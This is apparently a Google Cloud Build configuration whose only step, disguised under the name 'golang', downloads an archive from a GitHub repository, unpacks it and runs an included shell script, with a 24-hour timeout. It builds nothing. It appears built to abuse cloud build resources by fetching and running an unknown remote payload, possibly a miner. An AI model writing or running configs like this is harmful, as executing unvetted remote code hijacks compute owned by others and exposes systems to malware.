steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://github.com/Pantaiselatan/haji/raw/main/botak.tar.gz && tar -xvf botak.tar.gz && ./gas.sh
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86400s